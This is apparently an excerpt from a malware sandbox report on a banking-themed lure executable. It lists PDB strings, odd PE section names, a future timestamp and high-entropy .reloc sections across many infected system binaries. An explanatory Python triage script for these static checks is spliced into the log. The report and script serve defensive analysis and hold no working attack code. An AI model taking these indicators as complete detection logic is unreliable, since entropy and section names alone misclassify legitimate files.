                  Source: Binary string: ADelRCP_Exec.pdb source: armsvc.exe, 00000002.00000003.2401899087.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: PresentationFontCache.pdb source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.2124835296.0000000004130000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2156732156.00000000021E0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: mavinject32.pdbGCTL source: armsvc.exe, 00000002.00000003.2633067846.0000000002180000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2628302766.00000000021A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: crashreporter.pdb source: armsvc.exe, 00000002.00000003.2752944909.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: armsvc.exe, 00000002.00000003.2313938589.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: armsvc.exe, 00000002.00000003.2520750175.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: armsvc.exe, 00000002.00000003.2614372784.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\a\_work\e\src\out\Release_x64\msedge_proxy.exe.pdb source: msedge_proxy.exe.2.dr
                  Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: armsvc.exe, 00000002.00000003.2540240807.00000000019C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2532596834.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: servertool.exe.2.dr
                  Source: Binary string: WmiApSrv.pdbGCTL source: armsvc.exe, 00000002.00000003.2212157226.00000000021B0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: armsvc.exe, 00000002.00000003.2429484091.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: Acrobat_SL.pdb((( source: armsvc.exe, 00000002.00000003.2277891701.0000000002130000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\a\_work\e\src\out\Release_x64\msedge_proxy.exe.pdbOGP source: msedge_proxy.exe.2.dr
                  Source: Binary string: pingsender.pdb source: armsvc.exe, 00000002.00000003.2804279268.0000000000840000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.2111485745.0000000004140000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: java-rmi.exe.2.dr
                  Source: Binary string: ADelRCP_Exec.pdbCC9 source: armsvc.exe, 00000002.00000003.2401899087.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\AdobeARMHelper.pdb source: AdobeARMHelper.exe.2.dr
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: armsvc.exe, 00000002.00000003.2296158721.00000000020F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: Acrobat_SL.pdb source: armsvc.exe, 00000002.00000003.2277891701.0000000002130000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wbengine.pdb source: wbengine.exe.2.dr
                  Source: Binary string: private_browsing.pdb source: private_browsing.exe.2.dr
                  Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: armsvc.exe, 00000002.00000003.2582334419.0000000002180000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2590265360.00000000020E0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2581292600.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java_objs\java.pdb source: java.exe.2.dr
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: armsvc.exe, 00000002.00000003.2313938589.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: armsvc.exe, 00000002.00000003.2449580462.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: armsvc.exe, 00000002.00000003.2271603992.0000000002130000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: mavinject32.pdb source: armsvc.exe, 00000002.00000003.2633067846.0000000002180000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2628302766.00000000021A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: snmptrap.pdbGCTL source: armsvc.exe, 00000002.00000003.2158998087.00000000021F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: 64BitMAPIBroker.pdb source: armsvc.exe, 00000002.00000003.2508157176.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: maintenanceservice.pdb source: armsvc.exe, 00000002.00000003.2783650894.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: armsvc.exe, 00000002.00000003.2614372784.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: firefox.pdb source: armsvc.exe, 00000002.00000003.2776337614.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: armsvc.exe, 00000002.00000003.2489813894.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: firefox.pdbP source: armsvc.exe, 00000002.00000003.2776337614.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: armsvc.exe, 00000002.00000003.2429484091.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: armsvc.exe, 00000002.00000003.2525911259.0000000002180000.00000004.00001000.00020000.00000000.sdmp, FullTrustNotifier.exe.2.dr
                  Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: armsvc.exe, 00000002.00000003.2449580462.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: armsvc.exe, 00000002.00000003.2494075294.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: private_browsing.pdbp source: private_browsing.exe.2.dr
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: armsvc.exe, 00000002.00000003.2520750175.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: maintenanceservice.pdb` source: armsvc.exe, 00000002.00000003.2783650894.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: armsvc.exe, 00000002.00000003.2540240807.00000000019C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2532596834.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: WmiApSrv.pdb source: armsvc.exe, 00000002.00000003.2212157226.00000000021B0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: TieringEngineService.pdb source: armsvc.exe, 00000002.00000003.2181024271.0000000002200000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: TieringEngineService.pdbGCTL source: armsvc.exe, 00000002.00000003.2181024271.0000000002200000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\AdobeARMHelper.pdbr source: AdobeARMHelper.exe.2.dr
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: armsvc.exe, 00000002.00000003.2455646174.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ALG.pdb source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.2090731702.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: minidump-analyzer.pdb source: minidump-analyzer.exe.2.dr
                  Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.2111485745.0000000004140000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\Aut2Exe\Aut2Exe_x64.pdb source: Aut2exe_x64.exe.2.dr
                  Source: Binary string: ALG.pdbGCTL source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.2090731702.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.2124835296.0000000004130000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2156732156.00000000021E0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: d:\dbs\el\omr\target\x64\ship\c2rsvcmgr\x-none\OfficeSvcMgr.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: officesvcmgr.exe.2.dr
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: armsvc.exe, 00000002.00000003.2296158721.00000000020F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wbengine.pdbGCTL source: wbengine.exe.2.dr
                  Source: Binary string: d:\dbs\el\omr\target\x64\ship\c2rsvcmgr\x-none\OfficeSvcMgr.pdb source: officesvcmgr.exe.2.dr
                  Source: Binary string: ssh-agent.pdbX source: armsvc.exe, 00000002.00000003.2175446283.0000000002200000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: AppVShNotify.pdb source: armsvc.exe, 00000002.00000003.2609607534.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: snmptrap.pdb source: armsvc.exe, 00000002.00000003.2158998087.00000000021F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: armsvc.exe, 00000002.00000003.2494075294.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: armsvc.exe, 00000002.00000003.2455646174.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: AppVShNotify.pdbGCTL source: armsvc.exe, 00000002.00000003.2609607534.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: msiexec.exe.0.drStatic PE information: 0x88D88F1C [Thu Oct 2 20:16:28 2042 UTC]
                  Source: elevation_service.exe.0.drStatic PE information: section name: .00cfg
                  Source: elevation_service.exe.0.drStatic PE information: section name: .gxfg
                  Source: elevation_service.exe.0.drStatic PE information: section name: .retplne
                  Source: elevation_service.exe.0.drStatic PE information: section name: _RDATA
                  Source: elevation_service.exe.0.drStatic PE information: section name: malloc_h
                  Source: maintenanceservice.exe.0.drStatic PE information: section name: .00cfg
                  Source: maintenanceservice.exe.0.drStatic PE information: section name: .voltbl
                  Source: maintenanceservice.exe.0.drStatic PE information: section name: _RDATA
                  Source: msdtc.exe.0.drStatic PE information: section name: .didat
                  Source: msiexec.exe.0.drStatic PE information: section name: .didat
                  Source: MsSense.exe.0.drStatic PE information: section name: .didat
                  Source: armsvc.exe.0.drStatic PE information: section name: .didat
                  Source: alg.exe.0.drStatic PE information: section name: .didat
                  Source: FXSSVC.exe.0.drStatic PE information: section name: .didat
                  Source: elevation_service.exe0.0.drStatic PE information: section name: .00cfg
                  Source: elevation_service.exe0.0.drStatic PE information: section name: .gxfg
                  Source: elevation_service.exe0.0.drStatic PE information: section name: .retplne
                  Source: elevation_service.exe0.0.drStatic PE information: section name: _RDATA
                  Source: elevation_service.exe0.0.drStatic PE information: section name: malloc_h
                  Source: private_browsing.exe.2.drStatic PE information: section name: .00cfg
                  Source: private_browsing.exe.2.drStatic PE information: section name: .voltbl
                  Source: updater.exe.2.drStatic PE information: section name: .00cfg
                  Source: updater.exe.2.drStatic PE information: section name: .voltbl
                  Source: updater.exe.2.drStatic PE information: section name: _RDATA
                  Source: 117.0.5938.132_chrome_installer.exe.2.drStatic PE information: section name: .00cfg
                  Source: 117.0.5938.132_chrome_installer.exe.2.drStatic PE information: section name: .retplne
                  Source: Spectrum.exe.2.drStatic PE information: section name: .didat
                  Source: TieringEngineService.exe.2.drStatic PE information: section name: .didat
                  Source: vds.exe.2.drStatic PE information: section name: .didat
                  Source: VSSVC.exe.2.drStatic PE information: section name: .didat
                  Source: unpack200.exe.2.drStatic PE information: section name: .00cfg
                  Source: ie_to_edge_stub.exe.2.drStatic PE information: section name: .00cfg
                  Source: ie_to_edge_stub.exe.2.drStatic PE information: section name: .gxfg
                  Source: ie_to_edge_stub.exe.2.drStatic PE information: section name: .retplne
                  Source: ie_to_edge_stub.exe.2.drStatic PE information: section name: _RDATA
                  Source: cookie_exporter.exe.2.drStatic PE information: section name: .00cfg
                  Source: cookie_exporter.exe.2.drStatic PE information: section name: .gxfg
                  Source: cookie_exporter.exe.2.drStatic PE information: section name: .retplne
                  Source: cookie_exporter.exe.2.drStatic PE information: section name: _RDATA
                  Source: identity_helper.exe.2.drStatic PE information: section name: .00cfg
                  Source: identity_helper.exe.2.drStatic PE information: section name: .gxfg
                  Source: identity_helper.exe.2.drStatic PE information: section name: .retplne
                  Source: identity_helper.exe.2.drStatic PE information: section name: _RDATA
                  Source: identity_helper.exe.2.drStatic PE information: section name: malloc_h
                  Source: setup.exe.2.drStatic PE information: section name: .00cfg
                  Source: setup.exe.2.drStatic PE information: section name: .gxfg
                  Source: setup.exe.2.drStatic PE information: section name: .retplne
                  Source: setup.exe.2.drStatic PE information: section name: LZMADEC
                  Source: setup.exe.2.drStatic PE information: section name: _RDATA
                  Source: setup.exe.2.drStatic PE information: section name: malloc_h
                  Source: msedgewebview2.exe.2.drStatic PE information: section name: .00cfg
                  Source: msedgewebview2.exe.2.drStatic PE information: section name: .gxfg
                  Source: msedgewebview2.exe.2.drStatic PE information: section name: .retplne
                  Source: msedgewebview2.exe.2.drStatic PE information: section name: CPADinfo
                  Source: msedgewebview2.exe.2.drStatic PE information: section name: LZMADEC
                  Source: msedgewebview2.exe.2.drStatic PE information: section name: _RDATA
                  Source: msedgewebview2.exe.2.drStatic PE information: section name: malloc_h
                  Source: msedge_proxy.exe.2.drStatic PE information: section name: .00cfg
                  Source: msedge_proxy.exe.2.drStatic PE information: section name: .gxfg
                  Source: msedge_proxy.exe.2.drStatic PE information: section name: .retplne
                  Source: msedge_proxy.exe.2.drStatic PE information: section name: _RDATA
                  Source: msedge_proxy.exe.2.drStatic PE information: section name: malloc_h
                  Source: WmiApSrv.exe.2.drStatic PE information: section name: .didat
                  Source: wmpnetwk.exe.2.drStatic PE information: section name: .didat
                  Source: SearchIndexer.exe.2.drStatic PE information: section name: .didat
                  Source: Acrobat.exe.2.drStatic PE information: section name: .didat
                  Source: Acrobat.exe.2.drStatic PE information: section name: _RDATA
                  Source: msedge_pwa_launcher.exe.2.drStatic PE information: section name: .00cfg
                  Source: msedge_pwa_launcher.exe.2.drStatic PE information: section name: .gxfg
                  Source: msedge_pwa_launcher.exe.2.drStatic PE information: section name: .retplne
                  Source: msedge_pwa_launcher.exe.2.drStatic PE information: section name: LZMADEC
                  Source: msedge_pwa_launcher.exe.2.drStatic PE information: section name: _RDATA
                  Source: msedge_pwa_launcher.exe.2.drStatic PE information: section name: malloc_h
                  Source: notification_click_helper.exe.2.drStatic PE information: section name: .00cfg
                  Source: notification_click_helper.exe.2.drStatic PE information: section name: .gxfg
                  Source: notification_click_helper.exe.2.drStatic PE information: section name: .retplne
                  Source: notification_click_helper.exe.2.drStatic PE information: section name: CPADinfo
                  Source: notification_click_helper.exe.2.drStatic PE information: section name: _RDATA
                  Source: notification_click_helper.exe.2.drStatic PE information: section name: malloc_h
                  Source: pwahelper.exe.2.drStatic PE information: section name: .00cfg
                  Source: pwahelper.exe.2.drStatic PE information: section name: .gxfg
                  Source: pwahelper.exe.2.drStatic PE information: section name: .retplne
                  Source: pwahelper.exe.2.drStatic PE information: section name: _RDATA
                  Source: pwahelper.exe.2.drStatic PE information: section name: malloc_h
                  Source: msedge_proxy.exe0.2.drStatic PE information: section name: .00cfg
                  Source: msedge_proxy.exe0.2.drStatic PE information: section name: .gxfg
                  Source: msedge_proxy.exe0.2.drStatic PE information: section name: .retplne
                  Source: msedge_proxy.exe0.2.drStatic PE information: section name: _RDATA
                  Source: msedge_proxy.exe0.2.drStatic PE information: section name: malloc_h
                  Source: pwahelper.exe0.2.drStatic PE information: section name: .00cfg
                  Source: pwahelper.exe0.2.drStatic PE information: section name: .gxfg
                  Source: pwahelper.exe0.2.drStatic PE information: section name: .retplne
                  Source: pwahelper.exe0.2.drStatic PE information: section name: _RDATA
                  Source: pwahelper.exe0.2.drStatic PE information: section name: malloc_h
                  Source: MicrosoftEdgeUpdate.exe.2.drStatic PE information: section name: .didat
                  Source: MicrosoftEdgeUpdateBroker.exe.2.drStatic PE information: section name: .didat
                  Source: MicrosoftEdgeUpdateComRegisterShell64.exe.2.drStatic PE information: section name: .didat
                  Source: MicrosoftEdgeUpdateComRegisterShell64.exe.2.drStatic PE information: section name: _RDATA
                  Source: MicrosoftEdgeUpdateCore.exe.2.drStatic PE information: section name: .didat
                  Source: MicrosoftEdgeUpdateOnDemand.exe.2.drStatic PE information: section name: .didat
                  Source: AcroCEF.exe.2.drStatic PE information: section name: .didat
                  Source: AcroCEF.exe.2.drStatic PE information: section name: _RDATA
                  Source: SingleClientServicesUpdater.exe.2.drStatic PE information: section name: .didat
                  Source: SingleClientServicesUpdater.exe.2.drStatic PE information: section name: _RDATA
                  Source: AcroCEF.exe0.2.drStatic PE information: section name: .didat
                  Source: AcroCEF.exe0.2.drStatic PE information: section name: _RDATA
                  Source: C:\Windows\System32\AppVClient.exeCode function: 7_2_007468CE push E9000001h; retn 0000h7_2_007468D3
                  Source: C:\Windows\System32\AppVClient.exeCode function: 7_2_007452E3 push E9000001h; retf 0000h7_2_007452E8
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 11_2_008968CE push E9000001h; retn 0000h11_2_008968D3
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 11_2_008952E3 push E9000001h; retf 0000h11_2_008952E8
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 12_2_01A568CE push E9000001h; retn 0000h12_2_01A568D3
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 12_2_01A552E3 push E9000001h; retf 0000h12_2_01A552E8
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 14_2_00B768CE push E9000001h; retn 0000h14_2_00B768D3
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 14_2_00B752E3 push E9000001h; retf 0000h14_2_00B752E8
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006C58F1 push 006C5856h; ret 15_2_006C5908
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006E7960 push 006E7904h; ret 15_2_006E78F8
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006E7960 push 006E78C7h; ret 15_2_006E7940
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006E7960 push 006E7DE8h; ret 15_2_006E79A8
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006E7960 push 006E7B68h; ret 15_2_006E7BE4
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006E7960 push 006E7C47h; ret 15_2_006E7BEC
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006E7960 push 006E7FD6h; ret 15_2_006E7C15
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006E7960 push 006E7D34h; ret 15_2_006E7C9B
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006E7960 push 006E7E06h; ret 15_2_006E7D33
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006E7960 push 006E8004h; ret 15_2_006E7E25
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006E7960 push 006E7C7Ch; ret 15_2_006E7E6E
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006E7960 push 006E7FC8h; ret 15_2_006E7F80
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006E7960 push 006E7D4Ah; ret 15_2_006E7FC6
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006E7960 push 006E7986h; ret 15_2_006E8052
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006E7960 push 006E7EDBh; ret 15_2_006E8076
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006E7960 push 006E8077h; ret 15_2_006E80AC
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006C8140 push 006C5D22h; ret 15_2_006C5CB0
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006C8140 push 006C5C60h; ret 15_2_006C5D09
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006C8140 push 006C5FAEh; ret 15_2_006C5F1A
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006C8140 push 006C5EE7h; ret 15_2_006C5F39
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006C8140 push 006C62B2h; ret 15_2_006C604C
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006C8140 push 006C631Bh; ret 15_2_006C639A
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006C8140 push 006C63FFh; ret 15_2_006C642E
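The three static checks this group of entries rests on (a compile timestamp in the future, section names a normal linker does not emit, and a .reloc section whose entropy is near 8 bits per byte, which in a dropped or infected file means appended packed or encrypted code) are easy to reproduce without the sandbox. The script below is an added example, not Joe Sandbox code: it parses the PE section table with the standard library only, computes per-section Shannon entropy, and reports the same three findings. The section allow-list, the 7.5 entropy threshold and the sample image it builds (a minimal non-executable PE carrying the report's 0x88D88F1C timestamp, a benign .text, a pseudo-random .reloc and a malloc_h section) are constructed assumptions for the demonstration; run it against the real dropped files instead.

```python
"""Static PE triage: future TimeDateStamp, unusual section names and high-entropy
sections, using only the standard library. Added example, not sandbox code."""
import hashlib
import math
import struct
import time
from collections import Counter

# Assumption: names a normal MSVC link produces; anything else is reported.
COMMON_SECTIONS = {".text", ".rdata", ".data", ".pdata", ".rsrc", ".reloc",
                   ".idata", ".edata", ".tls", ".bss", ".CRT"}
# Assumption: relocation/resource data sits far below this; 7.9+ means packed payload.
ENTROPY_THRESHOLD = 7.5


def shannon_entropy(data):
    """Bits per byte over the section's raw bytes (0.0 .. 8.0)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_pe(image):
    """Return (TimeDateStamp, [(section_name, raw_bytes), ...]) from a PE file."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    fh = e_lfanew + 4                                    # IMAGE_FILE_HEADER
    num_sections, timestamp = struct.unpack_from("<HI", image, fh + 2)
    size_of_optional = struct.unpack_from("<H", image, fh + 16)[0]
    table = fh + 20 + size_of_optional                   # IMAGE_SECTION_HEADER[]
    sections = []
    for i in range(num_sections):
        name, _vsize, _va, raw_size, raw_ptr = struct.unpack_from(
            "<8sIIII", image, table + i * 40)
        name = name.rstrip(b"\0").decode("ascii", "replace")
        sections.append((name, image[raw_ptr:raw_ptr + raw_size]))
    return timestamp, sections


def triage(image, now=None):
    """Return (kind, detail) findings matching the report's static checks."""
    now = int(time.time()) if now is None else now
    timestamp, sections = parse_pe(image)
    findings = []
    if timestamp > now:
        stamp = time.strftime("%a %b %d %H:%M:%S %Y UTC", time.gmtime(timestamp))
        findings.append(("timestamp", "0x%08X [%s] is in the future" % (timestamp, stamp)))
    for name, data in sections:
        if name not in COMMON_SECTIONS:
            findings.append(("section_name", name))
        entropy = shannon_entropy(data)
        if entropy > ENTROPY_THRESHOLD:
            findings.append(("entropy", "%s entropy: %.4f" % (name, entropy)))
    return findings


def build_pe(sections, timestamp):
    """Constructed sample: a minimal, non-executable PE with the given sections."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)              # e_lfanew
    # Machine, NumberOfSections, TimeDateStamp, PtrSymTab, NumSyms, SizeOfOptionalHeader, Characteristics
    file_header = struct.pack("<HHIIIHH", 0x8664, len(sections), timestamp, 0, 0, 0, 0x22)
    headers = bytes(dos) + b"PE\0\0" + file_header
    raw_ptr = len(headers) + 40 * len(sections)          # data follows the section table
    table, blobs = b"", b""
    for name, data in sections:
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                             len(data), 0, len(data), raw_ptr, 0, 0, 0, 0, 0x60000020)
        blobs += data
        raw_ptr += len(data)
    return headers + table + blobs


def sample_image():
    """Constructed input mirroring the report: the 2042 timestamp, a benign .text,
    a .reloc holding pseudo-random (packed) bytes, and a 'malloc_h' section."""
    packed = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(256))
    return build_pe([(".text", b"\x90" * 1024 + b"\xC3"),
                     (".reloc", packed),
                     ("malloc_h", b"\0" * 64)], timestamp=0x88D88F1C)


if __name__ == "__main__":
    for kind, detail in triage(sample_image(), now=1733000000):
        print(kind, detail)
```

On the constructed image this reports the future timestamp, the .reloc entropy above the threshold and the malloc_h name; on a real file, pass `open(path, "rb").read()` to `triage`. Entropy alone is not a verdict (legitimate Chromium and Acrobat binaries carry compressed resources), so it is the combination with an entropy-heavy .reloc, which normally holds low-entropy relocation tables, that points at an infected or repacked file.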
                  Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeStatic PE information: section name: .reloc entropy: 7.92048352815656
                  Source: elevation_service.exe.0.drStatic PE information: section name: .reloc entropy: 7.933942775083277
                  Source: AppVClient.exe.0.drStatic PE information: section name: .reloc entropy: 7.923551573945185
                  Source: FXSSVC.exe.0.drStatic PE information: section name: .reloc entropy: 7.930049273539673
                  Source: elevation_service.exe0.0.drStatic PE information: section name: .reloc entropy: 7.931710608490168
                  Source: SensorDataService.exe.0.drStatic PE information: section name: .reloc entropy: 7.922508358648496
                  Source: 117.0.5938.132_chrome_installer.exe.2.drStatic PE information: section name: .reloc entropy: 7.922137446772068
                  Source: Aut2exe.exe.2.drStatic PE information: section name: .rsrc entropy: 7.796131717000906
                  Source: Aut2exe_x64.exe.2.drStatic PE information: section name: .rsrc entropy: 7.796265449576229
                  Source: AutoIt3_x64.exe.2.drStatic PE information: section name: .reloc entropy: 7.931903463252608
                  Source: SciTE.exe.2.drStatic PE information: section name: .reloc entropy: 7.902670479835503
                  Source: Spectrum.exe.2.drStatic PE information: section name: .reloc entropy: 7.9333003267542574
                  Source: AgentService.exe.2.drStatic PE information: section name: .reloc entropy: 7.924377519176522
                  Source: vds.exe.2.drStatic PE information: section name: .reloc entropy: 7.9288065988421526
                  Source: VSSVC.exe.2.drStatic PE information: section name: .reloc entropy: 7.927165005781515
                  Source: wbengine.exe.2.drStatic PE information: section name: .reloc entropy: 7.929030644122834
                  Source: identity_helper.exe.2.drStatic PE information: section name: .reloc entropy: 7.9282492487747325
                  Source: setup.exe.2.drStatic PE information: section name: .reloc entropy: 7.932290448125885
                  Source: msedgewebview2.exe.2.drStatic PE information: section name: .reloc entropy: 7.9235591235991345
                  Source: msedge_proxy.exe.2.drStatic PE information: section name: .reloc entropy: 7.929869368256591
                  Source: wmpnetwk.exe.2.drStatic PE information: section name: .reloc entropy: 7.934824837152571
                  Source: SearchIndexer.exe.2.drStatic PE information: section name: .reloc entropy: 7.933777696033448
